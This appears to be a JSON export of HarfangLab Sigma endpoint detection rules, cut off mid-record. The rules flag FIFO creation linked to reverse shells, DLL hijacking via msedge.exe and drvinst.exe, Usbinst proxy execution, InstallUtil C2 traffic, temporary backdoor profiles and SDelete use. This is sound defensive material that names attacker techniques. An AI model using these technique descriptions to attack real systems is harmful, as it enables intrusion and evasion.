"content": "title: FIFO File Created\nid: 0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47\ndescription: |\n Detects the execution of mkfifo or mknod.\n Both utilities can be used to create a FIFO file, a special kind of file that can be processed by two process at the same time (one writing to it and the other one reading it).\n Adversaries can create FIFO files in combination with openssl_client to create a reverse shell.\n It is recommended to investigate the process that ran mkfifo/mknod and its execution context to determine if this action was legitimate.\nreferences:\n - https://linux.die.net/man/1/mkfifo\n - https://threatpost.com/mitel-voip-bug-exploited/180079/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/12/15\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_mkfifo:\n # For new agents, we use the correlation rule (fc9663c5-b88d-487a-98b3-421c01431987).\n AgentVersion|lt|version: 5.4.0\n Image|endswith: '/mkfifo'\n\n selection_mknod:\n # For new agents, we use the correlation rule (fc9663c5-b88d-487a-98b3-421c01431987).\n AgentVersion|lt|version: 5.4.0\n Image|endswith: '/mknod'\n CommandLine|endswith: ' p'\n\n exclusion_bitdefender_install:\n ParentImage: '/usr/bin/??sh'\n ParentCommandLine|contains:\n - '/installer'\n - '/uninstall'\n - '/opt/bitdefender-security-tools/bin/'\n CurrentDirectory|contains: '/bitdefender'\n\n exclusion_rt_sctemp:\n # mkfifo rt_sctemp/ficsecuqlik_dataware.fifo\n # mkfifo rt_sctemp/ventiv_salaries.fifo\n CommandLine: 'mkfifo rt_sctemp/*.fifo'\n\n exclusion_flowcell_dna:\n CommandLine: 'mkfifo /dev/shm/nxf.*/.command.*'\n\n exclusion_qubes:\n ParentCommandLine|contains: '/usr/lib/qubes/qubes-rpc-multiplexer'\n\n exclusion_gitstatus:\n - CommandLine|contains: ' -- /tmp/gitstatus.'\n - ParentCommandLine|contains: ' -- /tmp/gitstatus.'\n\n exclusion_powerlevel10k:\n - CommandLine|contains: ' -- /tmp/p10k.worker.'\n - ParentCommandLine|contains: ' -- /tmp/p10k.worker.'\n\n exclusion_dracut:\n - CommandLine|startswith:\n - 'mkfifo /var/tmp/dracut.'\n - 'mkfifo /tmp/dracut.'\n - ParentCommandLine|startswith:\n - '/usr/bin/bash -p /bin/dracut'\n - '/usr/bin/bash -p /usr/bin/dracut'\n\n exclusion_hot_db_backup:\n ParentCommandLine|startswith: '/bin/sh /*/oracle/scripts/hot_db_backup.sh '\n\n exclusion_sqwmys_dumpdatabase:\n ParentCommandLine|startswith: '/bin/ksh /*/sqwareproduction/mysql/bin/sqwmys_dumpdatabase.ksh '\n\n exclusion_eset:\n Ancestors|contains: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|'\n\n exclusion_scality:\n CommandLine: 'mkfifo /tmp/tmp.*/stdout /tmp/tmp.*/stderr'\n ParentCommandLine: '/bin/bash /usr/bin/scality-backup'\n\n exclusion_agent:\n CommandLine|startswith: 'mkfifo /tmp/agent_linux_x86_64.sh.pipe.'\n\n exclusion_qradar:\n GrandparentCommandLine: '/opt/qradar/ca/bin/si-qradarca monitor -debug'\n\n exclusion_code:\n - ParentImage:\n - '/snap/code/*/usr/share/code/code'\n - '/usr/share/code/code'\n - GrandparentImage:\n - '/snap/code/*/usr/share/code/code'\n - '/usr/share/code/code'\n\n exclusion_codium:\n ParentImage: '/usr/share/codium/codium'\n\n exclusion_kamailio:\n CommandLine|startswith: 'mkfifo /tmp/kamailio_'\n ParentCommandLine|startswith: '/bin/sh /sbin/kamctl '\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/opt/VRTSvcs/bin/Application/ApplicationAgent|'\n - '|/opt/oneautomation/*/smgr/bin/ucybsmgr'\n - '/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/crond|'\n\n exclusion_tmux:\n CommandLine:\n - 'mkfifo /tmp/tmux_fzf_session_name'\n - 'mkfifo /tmp/fzf-fifo?-*'\n - 'mkfifo -m o+w /tmp/fzf-fifo?-*'\n Ancestors|contains: '/usr/bin/tmux|'\n\n exclusion_windsurf:\n GrandparentImage: '/usr/share/windsurf/windsurf'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47",
"rule_name": "FIFO File Created",
"rule_description": "Detects the execution of mkfifo or mknod.\nBoth utilities can be used to create a FIFO file, a special kind of file that can be processed by two process at the same time (one writing to it and the other one reading it).\nAdversaries can create FIFO files in combination with openssl_client to create a reverse shell.\nIt is recommended to investigate the process that ran mkfifo/mknod and its execution context to determine if this action was legitimate.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-01-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0fd65b55-ba18-4a16-86bb-19fdfaeb3e37",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079326Z",
"creation_date": "2026-03-23T11:45:34.079328Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079332Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://answers.microsoft.com/en-us/windows/forum/all/windows-temporary-user-profile-temp-issue/5fbefc7c-0b82-4395-bfda-6d7e2ebeacc6",
"https://attack.mitre.org/techniques/T1136/001/",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1070_004_temporary_user_profile_creation.yml",
"content": "title: Temporary User Profile Created\nid: 0fd65b55-ba18-4a16-86bb-19fdfaeb3e37\ndescription: |\n Detects the creation of a temporary user profile.\n A temporary profile is created each time an error condition prevents the user profile from loading.\n Temporary profiles are deleted at the end of each session, and changes made by the user to desktop settings and files are lost when the user logs off.\n A temporary profile is created in \"C:\\Users\\TEMP\" instead of the standard user profile folder \"C:\\Users\\\".\n An attacker can create this kind of user profile as a backdoor account to erase their tracks automatically after a log off.\n It is recommended to investigate the actions that this temporary user may have taken to determine whether this action was legitimate.\nreferences:\n - https://answers.microsoft.com/en-us/windows/forum/all/windows-temporary-user-profile-temp-issue/5fbefc7c-0b82-4395-bfda-6d7e2ebeacc6\n - https://attack.mitre.org/techniques/T1136/001/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2023/03/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Users\\TEMP\\NTUSER.DAT'\n\n exclusion_microsoftsearchinbing:\n Image: '?:\\Program Files (x86)\\Microsoft\\Microsoft Search in Bing\\MicrosoftSearchInBing.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n Image: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_msiexec:\n ProcessCommandLine:\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding ???????????????????????????????? E Global\\MSI0000'\n - '?:\\Windows\\System32\\MsiExec.exe -Embedding ???????????????????????????????? E Global\\MSI0000'\n ProcessParentCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_symantec:\n ProcessImage|startswith: '?:\\Program Files\\Symantec\\Symantec Endpoint Protection\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0fd65b55-ba18-4a16-86bb-19fdfaeb3e37",
"rule_name": "Temporary User Profile Created",
"rule_description": "Detects the creation of a temporary user profile.\nA temporary profile is created each time an error condition prevents the user profile from loading.\nTemporary profiles are deleted at the end of each session, and changes made by the user to desktop settings and files are lost when the user logs off.\nA temporary profile is created in \"C:\\Users\\TEMP\" instead of the standard user profile folder \"C:\\Users\\\".\nAn attacker can create this kind of user profile as a backdoor account to erase their tracks automatically after a log off.\nIt is recommended to investigate the actions that this temporary user may have taken to determine whether this action was legitimate.\n",
"rule_creation_date": "2023-03-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "10614140-6f5c-442a-b818-e7f6202dc54a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598780Z",
"creation_date": "2026-03-23T11:45:34.598784Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598791Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msedge.yml",
"content": "title: DLL Hijacking via msedge.exe\nid: 10614140-6f5c-442a-b818-e7f6202dc54a\ndescription: |\n Detects potential Windows DLL Hijacking via msedge.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msedge.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\explorerframe.dll'\n - '\\fastprox.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\ntmarta.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\twinapi.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\windowsudk.shellcommon.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\SysWOW64\\\\wbem\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\System32\\\\wbem\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\WinSxS\\\\wbem\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "10614140-6f5c-442a-b818-e7f6202dc54a",
"rule_name": "DLL Hijacking via msedge.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msedge.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "106504ea-01dd-41ce-a381-3e8f27c77ff0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077409Z",
"creation_date": "2026-03-23T11:45:34.077411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077415Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/api0cradle/LOLBAS/blob/master/OtherBinaries/Usbinst.md",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_usbinst.yml",
"content": "title: Proxy Execution via Usbinst\nid: 106504ea-01dd-41ce-a381-3e8f27c77ff0\ndescription: |\n Detects a suspicious execution of Citrix Usbinst.exe to proxy execution of malicious code.\n This binary, which is signed by Citrix, can be used to start malicious binaries whose inf file is passed as a parameter to usbinst.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to use a \"File download\" job to donwload and analyze the .inf file present in the command-line for malicious content.\nreferences:\n - https://github.com/api0cradle/LOLBAS/blob/master/OtherBinaries/Usbinst.md\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # By default C:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\Usbinst.exe\n - OriginalFileName: 'USBINST.EXE'\n - Image|endswith: '\\usbinst.exe'\n\n selection_arg:\n CommandLine|contains|all:\n - ' InstallHinfSection'\n - 'DefaultInstall'\n\n exclusion_citrix:\n - Image|endswith:\n - '\\Drivers64\\usbinst.exe'\n - '\\Devices64\\usbinst.exe'\n Signed: 'true'\n Signature: 'Citrix Systems, Inc.'\n - CommandLine|contains:\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Receiver\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\AppDataProtection\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\AppDataProtection\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Devices64\\ctxusbm\\ctxusbmon.inf'\n\n condition: selection and selection_arg and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "106504ea-01dd-41ce-a381-3e8f27c77ff0",
"rule_name": "Proxy Execution via Usbinst",
"rule_description": "Detects a suspicious execution of Citrix Usbinst.exe to proxy execution of malicious code.\nThis binary, which is signed by Citrix, can be used to start malicious binaries whose inf file is passed as a parameter to usbinst.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to use a \"File download\" job to donwload and analyze the .inf file present in the command-line for malicious content.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "108163b7-c707-4764-bf00-b43b3ae7e56d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080094Z",
"creation_date": "2026-03-23T11:45:34.080096Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080100Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cobbr/Covenant",
"https://attack.mitre.org/techniques/T1218/004/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1218_004_installutil_suspicious_network_communication.yml",
"content": "title: Suspicious InstallUtil.exe Network Communication\nid: 108163b7-c707-4764-bf00-b43b3ae7e56d\ndescription: |\n Detects a suspicious network communication from InstallUtil.exe.\n Attackers have used InstallUtil in the past to execute a malicious Beacon stager. It is commonly used for the Covenant Framework InstallUtil launcher.\n Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate all InstallUtil.exe network connections, correlate with process execution logs and .NET assembly loads, and terminate any suspicious communications.\nreferences:\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1218/004/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2021/11/10\nmodified: 2025/05/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.004\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Framework.Covenant\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n - Image|endswith: '\\InstallUtil.exe'\n - ProcessOriginalFileName: 'InstallUtil.exe'\n\n exclusion_localhost:\n DestinationIp:\n - '127.0.0.1'\n - '::1'\n\n exclusion_programfiles:\n ProcessCommandLine|contains:\n - '\\InstallUtil.exe *:\\Program Files\\'\n - '\\InstallUtil.exe *:\\Program Files (x86)\\'\n\n exclusion_archimed:\n - ProcessParentImage: '?:\\Program Files (x86)\\Archimed\\Elise\\EliseInstallUninstall.exe'\n - ProcessParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4\\\\*'\n - ProcessCurrentDirectory:\n - '?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4'\n - '?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4\\'\n\n exclusion_devexpress:\n ProcessParentImage|endswith: '\\DevExpressComponents-*.exe'\n ProcessCommandLine|contains|all:\n - ' /LogFile='\n - ' /DemosDir='\n - ' /DemosName=Components '\n - '\\Components\\System\\Components\\DevExpress.DemosUpdater.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "108163b7-c707-4764-bf00-b43b3ae7e56d",
"rule_name": "Suspicious InstallUtil.exe Network Communication",
"rule_description": "Detects a suspicious network communication from InstallUtil.exe.\nAttackers have used InstallUtil in the past to execute a malicious Beacon stager. It is commonly used for the Covenant Framework InstallUtil launcher.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate all InstallUtil.exe network connections, correlate with process execution logs and .NET assembly loads, and terminate any suspicious communications.\n",
"rule_creation_date": "2021-11-10",
"rule_modified_date": "2025-05-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1071",
"attack.t1218.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "108c4c3b-fe29-4e66-8036-5c56b0423fcb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087529Z",
"creation_date": "2026-03-23T11:45:34.087532Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087539Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx",
"https://attack.mitre.org/techniques/T1070/004/",
"https://attack.mitre.org/software/S0195/"
],
"name": "t1070_004_sdelete.yml",
"content": "title: SDelete Tool Execution\nid: 108c4c3b-fe29-4e66-8036-5c56b0423fcb\ndescription: |\n Detects the execution of SDelete tool, an application that securely deletes data in a way that makes it unrecoverable.\n This tool is part of the Microsoft Sysinternals suite tools and is often used by attackers to removal files behind their malicious activities.\n It is recommended to analyze both the parent process and the deleted files to determine whether this action has legitimate intent.\nreferences:\n - https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/software/S0195/\ndate: 2021/06/18\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.t1485\n - attack.s0195\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.SDelete\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith:\n - '\\sdelete.exe'\n - '\\sdelete64.exe'\n OriginalFileName: 'sdelete.exe'\n\n exclusion_image:\n Image:\n - '?:\\ProgramData\\chocolatey\\bin\\sdelete.exe'\n - '?:\\Program Files (x86)\\Skidata\\ParkingSW\\\\*\\Tools\\sdelete.exe'\n\n exclusion_generic_scripts_folder:\n ProcessGrandparentCommandLine|startswith: 'cscript.exe \\\\\\\\*\\\\*$\\Scripts\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "108c4c3b-fe29-4e66-8036-5c56b0423fcb",
"rule_name": "SDelete Tool Execution",
"rule_description": "Detects the execution of SDelete tool, an application that securely deletes data in a way that makes it unrecoverable.\nThis tool is part of the Microsoft Sysinternals suite tools and is often used by attackers to removal files behind their malicious activities.\nIt is recommended to analyze both the parent process and the deleted files to determine whether this action has legitimate intent.\n",
"rule_creation_date": "2021-06-18",
"rule_modified_date": "2025-11-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "10a3eb4c-d254-488d-843c-5e77fb2f6b4c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075752Z",
"creation_date": "2026-03-23T11:45:34.075754Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075759Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_drvinst.yml",
"content": "title: DLL Hijacking via drvinst.exe\nid: 10a3eb4c-d254-488d-843c-5e77fb2f6b4c\ndescription: |\n Detects potential Windows DLL Hijacking via drvinst.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'drvinst.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - 